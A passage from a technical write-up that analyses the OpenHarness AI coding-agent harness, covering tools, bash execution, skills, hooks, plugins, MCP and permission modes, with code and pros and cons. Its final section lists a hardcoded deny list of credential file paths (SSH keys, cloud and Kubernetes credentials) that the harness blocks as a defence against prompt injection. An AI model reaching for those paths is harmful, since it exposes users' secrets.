Why it matters: not embeddings, not full BM25 — just token-overlap scoring. Good enough for a repo with <100 memory files, and zero infra (no vector DB). The 2x weight on frontmatter (title/description) pushes memories to carry good metadata. CJK-aware: each Han ideograph counts as its own token (Chinese does not use spaces to split words) — important because HKUDS is a Hong Kong lab and memories may mix Chinese and English.

Code example (generic)

import re

def tokenize(text: str) -> set[str]:
    ascii_tok = {t for t in re.findall(r"\w+", text.lower()) if len(t) >= 3}
    han_tok = set(re.findall(r"[\u4e00-\u9fff]", text))
    return ascii_tok | han_tok

def rank_memories(query: str, memories, k=5):
    q_tokens = tokenize(query)
    scored = []
    for m in memories:
        meta_hits = sum(1 for t in q_tokens if t in m.meta.lower())
        body_hits = sum(1 for t in q_tokens if t in m.body.lower())
        score = meta_hits * 2.0 + body_hits
        if score:
            scored.append((score, m.modified_at, m))
    scored.sort(key=lambda t: (-t[0], -t[1]))
    return [m for _, _, m in scored[:k]]
Pros
  • Zero infra (no embedding service needed)
  • CJK-aware — Chinese/Japanese/Korean work out of the box
  • Metadata weighting rewards well-annotated memories
  • Recency tie-break — newer memories win
Cons
  • No semantic understanding (synonyms, translation)
  • Max 100 files scanned — scales poorly
  • Naive stopword filter (length ≥3 only)
  • Vietnamese doesn't tokenize correctly when diacritics are present
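The last con points at the ASCII-only `[A-Za-z0-9_]+` pattern, which splits Vietnamese words at every diacritic letter. A minimal sketch — my own, not repo code — of a Unicode-aware tokenizer that could close that gap, assuming NFC normalization is acceptable:

```python
import re
import unicodedata

def tokenize_vi(text: str) -> set[str]:
    # NFC-normalize so "e" + combining marks equals the precomposed letter,
    # making the same query match regardless of how it was typed
    text = unicodedata.normalize("NFC", text.lower())
    # \w is Unicode-aware in Python 3, so diacritic letters stay inside tokens
    return {t for t in re.findall(r"\w+", text) if len(t) >= 3}
```

With this, a query like "Tiếng Việt" yields the tokens "tiếng" and "việt" instead of fragments such as "ti" and "ng".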

C. Tool Design — 4 techniques

OpenHarness has 42 tools (tools/ folder, one file per tool). A Pydantic base class guarantees type safety and auto-generates JSON schemas for the Anthropic/OpenAI SDKs. Each tool has its own truncation limits, bash is protected by preflight + PTY, and Glob/Grep prefer ripgrep.

T10. Pydantic tool base + auto JSON schema

C.1
File: src/openharness/tools/base.py · Lines: 30–52

Code from OpenHarness

from abc import ABC, abstractmethod
from typing import ClassVar
from pydantic import BaseModel

class BaseTool(ABC):
    name: ClassVar[str]
    description: ClassVar[str]
    input_model: ClassVar[type[BaseModel]]
    is_read_only: ClassVar[bool] = False

    @classmethod
    def to_schema(cls) -> dict:
        """JSON Schema auto-generated from Pydantic input model."""
        return {
            "name": cls.name,
            "description": cls.description,
            "input_schema": cls.input_model.model_json_schema(),
        }

    @abstractmethod
    async def execute(self, args: BaseModel, ctx: ToolContext) -> ToolResult:
        """Execute tool with validated args; return result or error."""
        ...

# Concrete usage
class ReadInput(BaseModel):
    file_path: str
    offset: int | None = None
    limit: int | None = None

class ReadTool(BaseTool):
    name = "Read"
    description = "Read a file..."
    input_model = ReadInput
    is_read_only = True

    async def execute(self, args: ReadInput, ctx) -> ToolResult:
        ...
Why it matters: Writing tools Pydantic-first yields 3 benefits: (1) free validation — args reaching the tool have already passed the schema; (2) auto JSON schema — no hand-written schema per tool (prevents drift); (3) IDE-friendly — tool methods get correct type hints. The is_read_only constant is especially important: the permission checker uses it to decide whether confirmation is needed (read tools are always OK in DEFAULT mode).

Code example (generic)

from abc import ABC, abstractmethod
from pydantic import BaseModel, Field

class BaseTool(ABC):
    name: str
    input_model: type[BaseModel]

    @classmethod
    def schema(cls):
        return {"name": cls.name, "input_schema": cls.input_model.model_json_schema()}

    @abstractmethod
    async def execute(self, args: BaseModel) -> dict: ...

class GrepInput(BaseModel):
    pattern: str = Field(description="regex pattern")
    path: str | None = None

class GrepTool(BaseTool):
    name = "Grep"
    input_model = GrepInput

    async def execute(self, args: GrepInput):
        return await run_ripgrep(args.pattern, args.path)
Pros
  • Single source of truth for schemas (model_json_schema)
  • High-quality Pydantic validation errors
  • Passes mypy strict on every path
  • Field descriptions become LLM-readable docs
Cons
  • The Pydantic v1 → v2 jump still hurts (breaking changes)
  • Generated JSON schema is sometimes overly complex (Union types), confusing the model
  • No description_template mechanism like opencode's .txt files
  • Minor overhead per validation call

T11. Per-tool output truncation + UTF-8 normalization

C.2
Files: tools/bash_tool.py L129 · tools/web_fetch_tool.py L61 · tools/file_read_tool.py L57 · Limits: bash 12KB, web 50KB, file 200 lines default

Code from OpenHarness

# tools/bash_tool.py
MAX_BASH_OUTPUT_BYTES = 12 * 1024  # 12KB

def _truncate_output(raw: bytes, limit: int = MAX_BASH_OUTPUT_BYTES) -> str:
    # 1. Decode UTF-8 with replace policy (never raise on bad bytes)
    text = raw.decode("utf-8", errors="replace")
    if len(text) <= limit:
        return text
    # 2. Keep head + tail, drop middle with clear marker
    half = limit // 2
    return (
        text[:half]
        + f"\n\n... [output truncated: {len(text) - limit} bytes omitted] ...\n\n"
        + text[-half:]
    )

# tools/web_fetch_tool.py
MAX_WEB_FETCH_BYTES = 50 * 1024  # 50KB — web pages can be larger

# tools/file_read_tool.py — different strategy: line-based not byte-based
DEFAULT_READ_LIMIT = 200  # lines
MAX_LINE_LENGTH = 2000    # truncate long lines

def _read_with_limits(path: Path, offset: int, limit: int) -> str:
    lines = []
    with path.open("r", encoding="utf-8", errors="replace") as f:
        for i, line in enumerate(f):
            if i < offset:
                continue
            if i >= offset + limit:
                break
            if len(line) > MAX_LINE_LENGTH:
                line = line[:MAX_LINE_LENGTH] + "... [line truncated]\n"
            lines.append(f"{i+1}\t{line}")
    return "".join(lines)
Why it matters: Tool output always risks overflow — a 100MB build log, a 1GB CSV, a binary file. Each tool has its own policy: bash 12KB (keep head+tail, since errors tend to appear at the end), web 50KB (HTML parsing), read 200 lines (code-reading UX). UTF-8 errors="replace" is an invariant — never raise UnicodeDecodeError mid-stream (in case a binary file sneaks into the input).

Code example (generic)

def truncate_mid(text: str, limit: int) -> str:
    if len(text) <= limit:
        return text
    half = limit // 2
    dropped = len(text) - limit
    return text[:half] + f"\n... [{dropped} chars truncated] ...\n" + text[-half:]

def safe_decode(raw: bytes) -> str:
    return raw.decode("utf-8", errors="replace")

# Per-tool policy
LIMITS = {"Bash": 12*1024, "WebFetch": 50*1024, "Read": 200}  # line count for Read
Pros
  • Prevents a context bomb from a single tool call
  • Per-tool tuning — code reading differs from build logs
  • UTF-8 replace → never crashes on binary
  • Head+tail for bash — errors are usually at the end, the command at the start
Cons
  • 12KB for bash can cut right through a JSON object
  • No "spill to file" like opencode (truncate → file path)
  • Hardcoded limits — not configurable per session
  • Line-based Read handles a single very long line poorly
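The second con mentions opencode's "spill to file" alternative. A hypothetical sketch of combining both ideas — truncate what goes into the context window, but keep the full output on disk so the agent can Read/Grep it later (the helper name and temp-file scheme are my own, not repo code):

```python
import tempfile
from pathlib import Path

def truncate_or_spill(text: str, limit: int = 12 * 1024) -> str:
    """Head+tail truncation, but preserve the full output on disk."""
    if len(text) <= limit:
        return text
    # Spill full output to a temp file the agent can inspect in a follow-up call
    with tempfile.NamedTemporaryFile(
        "w", suffix=".log", delete=False, encoding="utf-8"
    ) as f:
        f.write(text)
        spill_path = Path(f.name)
    half = limit // 2
    return (
        text[:half]
        + f"\n... [{len(text) - limit} chars truncated; full output: {spill_path}] ...\n"
        + text[-half:]
    )
```

The marker embeds the spill path, so a model that needs the omitted middle can issue a targeted Read instead of re-running the command.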

T12. Bash interactive preflight + PTY + graceful timeout

C.3
File: src/openharness/tools/bash_tool.py · Lines: 145–208 · Timeout: 600s · Terminate grace: 2s

Code from OpenHarness

import pty, os, shlex, signal, asyncio

INTERACTIVE_MARKERS = (
    ("npm create", "--yes"),
    ("npx create", "--yes"),
    ("pnpm create", "--yes"),
    ("yarn create", "--yes"),
    ("bun create", "--yes"),
    ("pip install", "--quiet"),  # may prompt for confirmation
    ...
)

def _preflight_interactive_command(cmd: str) -> str | None:
    """Return error msg if cmd would prompt interactively."""
    tokens = shlex.split(cmd)
    joined = " ".join(tokens).lower()
    for marker, required_flag in INTERACTIVE_MARKERS:
        if marker in joined and required_flag not in joined:
            return f"Command likely requires interaction. Add {required_flag} or equivalent."
    return None

async def run_bash(cmd: str, timeout: float = 600) -> BashResult:
    # 1. Preflight check — reject scaffolds without --yes/--ci
    if err := _preflight_interactive_command(cmd):
        return BashResult(exit_code=2, stderr=err, is_error=True)
    # 2. Allocate PTY so that TTY-detecting programs work (vim -c, ansi colors)
    master_fd, slave_fd = pty.openpty()
    proc = await asyncio.create_subprocess_exec(
        "bash", "-c", cmd,
        stdin=slave_fd, stdout=slave_fd, stderr=slave_fd,  # merge stderr→stdout
        preexec_fn=os.setsid,  # own process group
    )
    # 3. Read from master fd with overall timeout
    output = bytearray()
    try:
        await asyncio.wait_for(_read_pty(master_fd, output), timeout=timeout)
    except asyncio.TimeoutError:
        # 4. Graceful: SIGTERM → wait 2s → SIGKILL
        os.killpg(os.getpgid(proc.pid), signal.SIGTERM)
        try:
            await asyncio.wait_for(proc.wait(), timeout=2.0)
        except asyncio.TimeoutError:
            os.killpg(os.getpgid(proc.pid), signal.SIGKILL)
        return BashResult(exit_code=-1, output=bytes(output), timed_out=True)
    return BashResult(exit_code=proc.returncode, output=bytes(output))
Why it matters: 3 survival tricks when an LLM runs bash: (1) Preflight rejects npm create X without --yes → avoids the agent hanging forever waiting for user confirmation; (2) PTY lets tools like git, pip, npm run in the right mode (they behave differently in a TTY vs a pipe); (3) Process group + graceful terminate → child processes get killed too, no zombies. The 600s timeout is long, but there's a 2s grace terminate before SIGKILL.

Code example (generic)

import asyncio, shlex, os, signal, pty

INTERACTIVE = ("npm create", "npx create", "yarn create")

async def safe_bash(cmd: str, timeout=600):
    for m in INTERACTIVE:
        if m in cmd.lower() and "--yes" not in cmd:
            return {"error": f"'{m}' requires --yes to run non-interactively"}
    master, slave = pty.openpty()
    proc = await asyncio.create_subprocess_exec(
        "bash", "-c", cmd,
        stdin=slave, stdout=slave, stderr=slave,
        preexec_fn=os.setsid,
    )
    try:
        await asyncio.wait_for(proc.wait(), timeout)
    except asyncio.TimeoutError:
        os.killpg(os.getpgid(proc.pid), signal.SIGTERM)
        try:
            await asyncio.wait_for(proc.wait(), 2)
        except asyncio.TimeoutError:
            os.killpg(os.getpgid(proc.pid), signal.SIGKILL)
    return {"exit": proc.returncode}
Pros
  • Preflight catches most scaffold prompts
  • PTY makes git/pip/npm output format correctly
  • Process-group kill — zombie-free
  • Graceful 2s terminate gives the process a chance to flush stdout
Cons
  • INTERACTIVE_MARKERS is incomplete — easy to miss new tools
  • PTY doesn't work on Windows (needs an alternative)
  • Stderr merged into stdout — the separate signal is lost
  • 600s timeout is too long for many fast commands

T13. Ripgrep-first Glob/Grep with Python fallback

C.4
Files: tools/glob_tool.py L65–122 · tools/grep_tool.py L37–83

Code from OpenHarness

import shutil, subprocess, fnmatch
from pathlib import Path

RG_BIN = shutil.which("rg")  # detect at import time

async def glob_files(pattern: str, root: Path, *,
                     respect_gitignore: bool = True) -> list[Path]:
    if RG_BIN:
        # rg --files --glob PATTERN — respects .gitignore by default
        args = [RG_BIN, "--files", "--glob", pattern, str(root)]
        if not respect_gitignore:
            args.insert(1, "--no-ignore")
        # Include hidden files if inside a git repo
        if (root / ".git").is_dir():
            args.insert(1, "--hidden")
        proc = await asyncio.create_subprocess_exec(
            *args, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.DEVNULL
        )
        stdout, _ = await proc.communicate()
        return [Path(line) for line in stdout.decode().splitlines()]
    # --- Python fallback ---
    # Respect .gitignore via pathspec library; else just glob
    results = []
    for p in root.rglob("*"):
        if not p.is_file():
            continue
        if fnmatch.fnmatch(p.name, pattern) or fnmatch.fnmatch(str(p), pattern):
            if respect_gitignore and _is_gitignored(p, root):
                continue
            results.append(p)
    return results

async def grep_content(pattern: str, root: Path, *,
                       case_insensitive=False) -> list[GrepMatch]:
    if RG_BIN:
        args = [RG_BIN, "--json", "--with-filename", pattern, str(root)]
        if case_insensitive:
            args.append("-i")
        ...
    else:
        # Python fallback with re.compile()
        regex = re.compile(pattern, re.IGNORECASE if case_insensitive else 0)
        ...
Why it matters: Ripgrep is ~10-100x faster than Python and respects .gitignore by default. OpenHarness detects rg at import time (shutil.which) — use it if present, otherwise fall back to Python. A nice touch: inside a git repo, --hidden is added automatically (to find .github/, .vscode/). The Python fallback uses fnmatch + rglob — slow, but dependency-free.

Code example (generic)

import shutil, asyncio
from pathlib import Path

RG = shutil.which("rg")

async def fast_glob(pattern: str, root: Path):
    if RG:
        args = [RG, "--files", "--glob", pattern, str(root)]
        if (root / ".git").is_dir():
            args.insert(1, "--hidden")
        proc = await asyncio.create_subprocess_exec(*args, stdout=asyncio.subprocess.PIPE)
        out, _ = await proc.communicate()
        return [Path(l) for l in out.decode().splitlines()]
    # fallback
    import fnmatch
    return [p for p in root.rglob("*") if p.is_file() and fnmatch.fnmatch(p.name, pattern)]
Pros
  • 10-100x faster than Python glob on large repos
  • .gitignore respected out of the box
  • Graceful fallback when rg is missing
  • JSON output is easy to parse
Cons
  • Hidden-file behavior differs between rg and the Python fallback (inconsistent)
  • rg-specific features are missing in the Python fallback (PCRE2, multiline)
  • Subprocess overhead for small queries
  • Paths with spaces need careful quoting
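The repo excerpt elides the `--json` parsing step. A sketch of what that step typically looks like: ripgrep emits one JSON event per line, and only `type == "match"` events carry hits (field names follow rg's documented JSON output schema; the helper name is mine):

```python
import json

def parse_rg_json(stdout: str) -> list[dict]:
    """Parse the `rg --json` event stream.

    Each line is a JSON object; "begin"/"end"/"summary" events are
    bookkeeping, only "match" events carry actual hits.
    """
    matches = []
    for line in stdout.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        if event.get("type") != "match":
            continue
        data = event["data"]
        matches.append({
            "path": data["path"]["text"],
            "line_number": data["line_number"],
            "line": data["lines"]["text"].rstrip("\n"),
        })
    return matches
```

Parsing per line (rather than one big document) also lets the caller stream results as rg produces them.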

D. Extension Ecosystem — 4 techniques

OpenHarness has 4 surfaces for extension: skills (markdown), hooks (policy/observability), plugins (bundling skill+hook+mcp), MCP (external tool servers). All are discovered from the filesystem — no configuration-registry dependency.

T14. Markdown-based skill system + frontmatter

D.1
File: src/openharness/skills/loader.py · Lines: 27–51 · Scan paths: bundled + ~/.openharness/skills/<skill>/SKILL.md + plugin skills

Code from OpenHarness

import yaml, re
from pathlib import Path
from dataclasses import dataclass

FRONTMATTER_RE = re.compile(r"^---\n(.*?)\n---\n(.*)", re.DOTALL)

@dataclass
class Skill:
    name: str
    description: str
    path: Path
    body: str

def load_skills(cwd: Path) -> list[Skill]:
    skills: list[Skill] = []
    seen_names: set[str] = set()
    for base in _skill_roots(cwd):  # bundled + ~/.openharness/skills + plugins
        if not base.is_dir():
            continue
        for skill_dir in sorted(base.iterdir()):
            manifest = skill_dir / "SKILL.md"
            if not manifest.exists():
                continue
            raw = manifest.read_text(encoding="utf-8")
            match = FRONTMATTER_RE.match(raw)
            if match:
                meta = yaml.safe_load(match.group(1)) or {}
                body = match.group(2).strip()
                name = meta.get("name") or skill_dir.name
                description = meta.get("description", "")
            else:
                # Fallback: derive from first heading + first paragraph
                name = skill_dir.name
                first_heading = re.search(r"^# (.+)$", raw, re.M)
                title = first_heading.group(1) if first_heading else name
                first_para = raw.split("\n\n")[1] if "\n\n" in raw else ""
                description = first_para[:200]
                body = raw
            # Dedup by name, first wins (bundled > user > plugin priority)
            if name in seen_names:
                continue
            seen_names.add(name)
            skills.append(Skill(name=name, description=description, path=manifest, body=body))
    return skills
Why it matters: A skill = a folder containing SKILL.md with descriptive frontmatter. The system prompt injects the descriptions of all available skills — the LLM reads a description and "activates" the skill if relevant (i.e., requests a read of SKILL.md for the full instructions). This design mirrors Claude Code skills. The fallback when frontmatter is missing makes testing easy (a single SKILL.md file is enough). First-wins priority: bundled takes precedence, then user overrides, then plugins.

Code example (generic)

import yaml, re
from pathlib import Path

def discover_skills(roots: list[Path]):
    skills = []
    seen = set()
    for root in roots:
        if not root.is_dir():
            continue
        for d in sorted(root.iterdir()):
            mf = d / "SKILL.md"
            if not mf.exists():
                continue
            raw = mf.read_text()
            m = re.match(r"^---\n(.*?)\n---\n(.*)", raw, re.DOTALL)
            meta, body = (yaml.safe_load(m.group(1)), m.group(2)) if m else ({}, raw)
            name = meta.get("name", d.name)
            if name in seen:  # first-wins
                continue
            seen.add(name)
            skills.append({"name": name, "description": meta.get("description", ""), "body": body})
    return skills
Pros
  • User-friendly — markdown is all you need to know
  • Git-friendly — easy to diff/review
  • Frontmatter machine-readable, body human-readable
  • Layered priority (builtin/user/plugin)
Cons
  • Large skills cost tokens when the LLM loads the body
  • No versioning / inter-skill dependencies
  • Priority can surprise (first-wins is hard to debug with many plugins)
  • Fallback parsing is unpredictable with non-standard headings

→ Deep dive T14: Markdown-based skill system + frontmatter discovery

T15. Hook lifecycle system (6 events · 4 types · hot reload)

D.2
Files: src/openharness/hooks/events.py, hooks/executor.py · Reloader: HookReloader watches mtime

Code from OpenHarness

from enum import Enum

class HookEvent(Enum):
    SESSION_START = "session_start"
    SESSION_END = "session_end"
    PRE_COMPACT = "pre_compact"
    POST_COMPACT = "post_compact"
    PRE_TOOL_USE = "pre_tool_use"
    POST_TOOL_USE = "post_tool_use"

class HookType(Enum):
    COMMAND = "command"  # exec shell command, check exit code
    PROMPT = "prompt"    # LLM judges payload vs policy
    HTTP = "http"        # POST payload to webhook
    AGENT = "agent"      # spawn subagent for decision

class HookExecutor:
    async def execute(self, event: HookEvent, payload: dict) -> HookResult:
        self._maybe_reload()  # hot-reload when files changed
        blocked, reasons = False, []
        for hook in self._hooks_for(event):
            res = await hook.run(payload)
            reasons.append(res.message)
            if res.blocked:
                blocked = True
                if hook.type == HookType.COMMAND:
                    break  # short-circuit for command hooks
        return HookResult(blocked=blocked, reason="; ".join(reasons))

class HookReloader:
    """Watch hook file mtime; reload config when modified."""
    def maybe_reload(self):
        for path, old_mtime in list(self._mtimes.items()):
            new_mtime = path.stat().st_mtime
            if new_mtime != old_mtime:
                log.info("reloading hooks from %s", path)
                self._hooks = self._parse(path)
                self._mtimes[path] = new_mtime
Why it matters: The 6-event hook lifecycle covers most policy scenarios: session bounds (SESSION_START/END), compaction tracking (PRE/POST_COMPACT), tool enforcement (PRE/POST_TOOL_USE). The 4 hook types let users pick a mechanism: command = simple shell, prompt = LLM-based policy, HTTP = remote SIEM, agent = sophisticated reasoning. Hot reload via mtime watch — edit hooks.yaml without restarting the session.

Code example (generic)

import asyncio, json
from enum import Enum

class HookEvent(Enum):
    PRE_TOOL = "pre_tool"
    POST_TOOL = "post_tool"

class CommandHook:
    def __init__(self, cmd):
        self.cmd = cmd

    async def run(self, payload):
        proc = await asyncio.create_subprocess_shell(
            self.cmd,
            stdin=asyncio.subprocess.PIPE,
            stdout=asyncio.subprocess.PIPE,
            stderr=asyncio.subprocess.PIPE,
        )
        out, err = await proc.communicate(json.dumps(payload).encode())
        return {"blocked": proc.returncode != 0, "reason": err.decode()}

class HookExecutor:
    def __init__(self, hooks_by_event):
        self.hooks = hooks_by_event

    async def fire(self, event, payload):
        for h in self.hooks.get(event, []):
            r = await h.run(payload)
            if r["blocked"]:
                return r
        return {"blocked": False}
Pros
  • 6 lifecycle events cover compaction + tool + session
  • Hot reload — no session restart
  • 4 hook types — flexible (simple → sophisticated)
  • Short-circuit for command hooks — perf-friendly
Cons
  • LLM-based prompt hooks cost API calls — latency + cost
  • Hot reload races with hooks currently running
  • No "chain" semantics — each hook is independent
  • Agent hooks can recursively call back into the main agent
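The last con — an agent hook spawning a subagent whose tool calls fire hooks again — is commonly mitigated with a depth guard. A sketch under my own naming (not repo code), using a contextvar so the counter is scoped per task tree:

```python
import contextvars

# Depth counter propagates across awaits within one task context
_hook_depth = contextvars.ContextVar("hook_depth", default=0)
MAX_HOOK_DEPTH = 2

async def fire_with_guard(executor, event, payload):
    """Skip hook execution once hook-spawned agents nest too deeply."""
    depth = _hook_depth.get()
    if depth >= MAX_HOOK_DEPTH:
        return {"blocked": False, "reason": "hook recursion limit hit; skipping"}
    token = _hook_depth.set(depth + 1)
    try:
        return await executor.fire(event, payload)
    finally:
        _hook_depth.reset(token)
```

Returning "not blocked" at the limit is a fail-open choice; a stricter harness could fail closed instead.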

→ Deep dive T15: Hook lifecycle system (6 events · 4 types · hot reload)

T16. Plugin manifest-based loading

D.3
File: src/openharness/plugins/loader.py · Lines: 104–157 · Paths: ~/.openharness/plugins/ (user) + .openharness/plugins/ (project)

Code from OpenHarness

import yaml
from pathlib import Path
from dataclasses import dataclass, field

@dataclass
class PluginManifest:
    name: str
    version: str
    description: str
    skills_dir: str | None = None    # relative path to skills/
    hooks_file: str | None = None    # relative path to hooks.yaml
    mcp_file: str | None = None      # relative path to mcp.json
    commands_dir: str | None = None  # relative path to commands/

def load_plugins(cwd: Path) -> list[Plugin]:
    plugins = []
    roots = [
        Path.home() / ".openharness" / "plugins",
        cwd / ".openharness" / "plugins",
    ]
    for root in roots:
        if not root.is_dir():
            continue
        for plugin_dir in sorted(root.iterdir()):
            manifest_path = plugin_dir / "plugin.yaml"
            if not manifest_path.exists():
                continue
            data = yaml.safe_load(manifest_path.read_text())
            manifest = PluginManifest(**data)
            # Resolve relative paths to absolute
            skills = []
            if manifest.skills_dir:
                skills_path = plugin_dir / manifest.skills_dir
                skills = _load_skills_from(skills_path)
            hooks = []
            if manifest.hooks_file:
                hooks_path = plugin_dir / manifest.hooks_file
                hooks = _parse_hooks_yaml(hooks_path)
            mcp_servers = []
            if manifest.mcp_file:
                mcp_path = plugin_dir / manifest.mcp_file
                mcp_servers = _parse_mcp_json(mcp_path)
            commands = []
            if manifest.commands_dir:
                # Namespace: "plugin:<plugin_name>:<file_stem>"
                commands_path = plugin_dir / manifest.commands_dir
                for cmd_file in sorted(commands_path.glob("*.md")):
                    commands.append(Command(
                        name=f"plugin:{manifest.name}:{cmd_file.stem}",
                        body=cmd_file.read_text(),
                    ))
            plugins.append(Plugin(
                manifest=manifest,
                skills=skills,
                hooks=hooks,
                mcp_servers=mcp_servers,
                commands=commands,
            ))
    return plugins
Why it matters: One plugin bundles several extension types: skills + hooks + MCP + commands. The plugin.yaml manifest only lists relative paths — it doesn't embed content. Commands get the namespace plugin:<name>:<file> to avoid conflicts. Two roots: user-global + project-local — project overrides user. This is the familiar Claude Code plugin pattern, ported to Python.

Code example (generic)

import yaml
from pathlib import Path

def load_plugins(roots: list[Path]) -> list:
    out = []
    for root in roots:
        if not root.is_dir():
            continue
        for d in sorted(root.glob("*")):
            mf = d / "plugin.yaml"
            if not mf.exists():
                continue
            data = yaml.safe_load(mf.read_text())
            plugin = {
                "name": data["name"],
                "root": d,
                "skills": load_skills_dir(d / data.get("skills_dir", "skills")),
                "hooks": load_hooks(d / data["hooks_file"]) if data.get("hooks_file") else [],
                "mcp": load_mcp(d / data["mcp_file"]) if data.get("mcp_file") else [],
            }
            out.append(plugin)
    return out
Pros
  • A single manifest declares everything
  • Bundles skill + hook + MCP coherently
  • Namespacing avoids command conflicts
  • Distributable via git/filesystem
Cons
  • No semver / dependency resolution
  • Security: plugin hooks can exec arbitrary shell
  • No signing / verification
  • Rigid bundle layout (fixed skills_dir name)

→ Deep dive T16: Plugin manifest-based loading

T17. MCP stdio + HTTP transport + dynamic Pydantic adapter

D.4
File: src/openharness/mcp/client.py · Lines: 29–95 · Aggregator: McpClientManager uses AsyncExitStack

Code from OpenHarness

from contextlib import AsyncExitStack
from mcp import ClientSession, StdioServerParameters
from mcp.client.stdio import stdio_client
from mcp.client.sse import sse_client
from pydantic import create_model

class McpClientManager:
    def __init__(self, server_configs):
        self._configs = server_configs
        self._stack: AsyncExitStack | None = None
        self._sessions: dict[str, ClientSession] = {}
        self._tools: list[McpTool] = []

    async def __aenter__(self):
        self._stack = AsyncExitStack()
        await self._stack.__aenter__()
        for name, cfg in self._configs.items():
            if cfg.transport == "stdio":
                params = StdioServerParameters(command=cfg.command, args=cfg.args, env=cfg.env)
                stream_ctx = stdio_client(params)
            elif cfg.transport == "http":
                stream_ctx = sse_client(cfg.url, headers=cfg.headers)
            else:
                raise ValueError(f"Unknown MCP transport: {cfg.transport}")
            streams = await self._stack.enter_async_context(stream_ctx)
            session = ClientSession(*streams)
            await self._stack.enter_async_context(session)
            await session.initialize()
            self._sessions[name] = session
            # Discover tools + build Pydantic adapter for each
            resp = await session.list_tools()
            for tool in resp.tools:
                InputModel = _build_pydantic_from_schema(tool.inputSchema, name=tool.name)
                self._tools.append(McpTool(
                    server=name,
                    name=f"mcp__{name}__{tool.name}",  # namespaced tool id
                    description=tool.description,
                    input_model=InputModel,
                    session=session,
                ))
        return self

    async def __aexit__(self, *exc):
        if self._stack:
            await self._stack.__aexit__(*exc)

def _build_pydantic_from_schema(schema: dict, *, name: str):
    """Convert JSON schema to a dynamic Pydantic model."""
    fields = {}
    for prop, spec in schema.get("properties", {}).items():
        py_type = _json_type_to_python(spec.get("type", "string"))
        fields[prop] = (py_type, ...)  # required
    return create_model(f"Mcp_{name}_Input", **fields)
Why it matters: MCP lets OpenHarness use tools from multiple independent servers (GitHub, Jira, Slack MCPs...). A per-server AsyncExitStack guarantees correct cleanup even if one server fails to init. create_model builds Pydantic from JSON schema at runtime — MCP tools get validated like native tools. The mcp__<server>__<tool> namespace avoids conflicts between servers sharing a tool name. Dual transport stdio+HTTP covers local subprocesses and remote SaaS MCPs.

Code example (generic)

from contextlib import AsyncExitStack
from pydantic import create_model

class McpManager:
    async def __aenter__(self):
        self.stack = AsyncExitStack()
        await self.stack.__aenter__()
        self.sessions = {}
        self.tools = []
        for name, cfg in self.configs.items():
            ctx = stdio_client(cfg) if cfg.transport == "stdio" else sse_client(cfg)
            streams = await self.stack.enter_async_context(ctx)
            sess = await self.stack.enter_async_context(ClientSession(*streams))
            await sess.initialize()
            for t in (await sess.list_tools()).tools:
                self.tools.append({
                    "name": f"mcp__{name}__{t.name}",
                    "model": create_model(f"M_{t.name}", **...),
                })
        return self
Pros
  • Dual transport — stdio (local) + HTTP (remote)
  • AsyncExitStack → safe nested cleanup
  • Dynamic Pydantic — MCP tools validated like natives
  • Namespacing avoids conflicts
Cons
  • JSON schema → Pydantic doesn't yet support complex allOf/oneOf
  • One stuck server blocks the whole init (no per-server timeout)
  • SSE transport has no built-in retry
  • Schema doesn't support descriptions for enum values

→ Deep dive T17: MCP stdio + HTTP transport + dynamic Pydantic adapter

E. Permission & Safety — 4 techniques

OpenHarness's permission model has 3 modes + built-in sensitive-path protection + 6-layer hierarchical evaluation + async interactive approval. This is where OpenHarness is more careful than opencode: sensitive-path protection cannot be overridden, even in FULL_AUTO.

T18. 3-mode permission system (DEFAULT / PLAN / FULL_AUTO)

E.1
File: src/openharness/permissions/modes.py · Constants: PermissionMode.DEFAULT / PLAN / FULL_AUTO

Code from OpenHarness

from enum import Enum

class PermissionMode(Enum):
    DEFAULT = "default"      # read OK; write & mutation need confirm
    PLAN = "plan"            # only read; block all mutations (even bash read-only)
    FULL_AUTO = "full_auto"  # everything OK (except sensitive paths)

# Used in PermissionChecker.evaluate() — see T20
if self._settings.mode == PermissionMode.FULL_AUTO:
    return PermissionDecision(allowed=True, reason="Auto mode allows all tools")
if is_read_only:
    return PermissionDecision(allowed=True, reason="read-only tools are allowed")
if self._settings.mode == PermissionMode.PLAN:
    return PermissionDecision(
        allowed=False,
        reason="Plan mode blocks mutating tools until the user exits plan mode",
    )
# DEFAULT: require confirmation for mutating tools
return PermissionDecision(
    allowed=False,
    requires_confirmation=True,
    reason="Mutating tools require user confirmation in default mode. ...",
)
Why it matters: The 3 modes cover 3 workflows: (1) DEFAULT — cautious, user-in-the-loop for every mutation; (2) PLAN — "think only, don't act" for research/brainstorming; (3) FULL_AUTO — unattended runs like cron autopilot. Mode is separated from the approval flow — the checker only returns a decision; the UI is responsible for showing the prompt. Like Claude Code's "auto mode", but with an extra PLAN mode (which opencode lacks).

Code example (generic)

from enum import Enum

class Mode(Enum):
    DEFAULT = "default"
    PLAN = "plan"
    FULL_AUTO = "full_auto"

def decide(mode: Mode, is_read_only: bool) -> str:
    if mode == Mode.FULL_AUTO:
        return "allow"
    if is_read_only:
        return "allow"
    if mode == Mode.PLAN:
        return "deny"
    return "confirm"  # DEFAULT needs user approval
Pros
  • 3 modes cover trivial → unattended workflows
  • Mode separated from approval → checker is a pure function
  • PLAN is especially useful as a "research mode"
  • User intent is explicit — no config editing needed
Cons
  • 3 modes aren't granular enough (e.g. "allow bash, confirm edit")
  • FULL_AUTO can be abused in production
  • PLAN blocks read-only bash (git status) if the tool self-declares as mutating
  • Mode toggle doesn't persist per project

→ Deep dive T18: 3-mode permission system (DEFAULT / PLAN / FULL_AUTO)

T19. Built-in sensitive path protection (hardcoded glob)

E.2
File: src/openharness/permissions/checker.py · Lines: 14–37 · Patterns: 10+ hardcoded

Code from OpenHarness

# Paths that are always denied regardless of permission mode or user config.
# These protect high-value credential and key material from LLM-directed access
# (including via prompt injection). Patterns use fnmatch syntax and are matched
# against the fully-resolved absolute path produced by the query engine.
SENSITIVE_PATH_PATTERNS: tuple[str, ...] = (
    # SSH keys and config
    "*/.ssh/*",
    # AWS credentials
    "*/.aws/credentials", "*/.aws/config",
    # GCP credentials
    "*/.config/gcloud/*",
    # Azure credentials
    "*/.azure/*",
    # GPG keys
    "*/.gnupg/*",
    # Docker credentials
    "*/.docker/config.json",
    # Kubernetes credentials
    "*/.kube/config",
    # OpenHarness own credential stores
    "*/.openharness/credentials.json",
    "*/.openharness/copilot_auth.json",
)

def evaluate(self, tool_name, *, is_read_only, file_path=None, command=None):
    # Sensitive path check runs FIRST, cannot be overridden
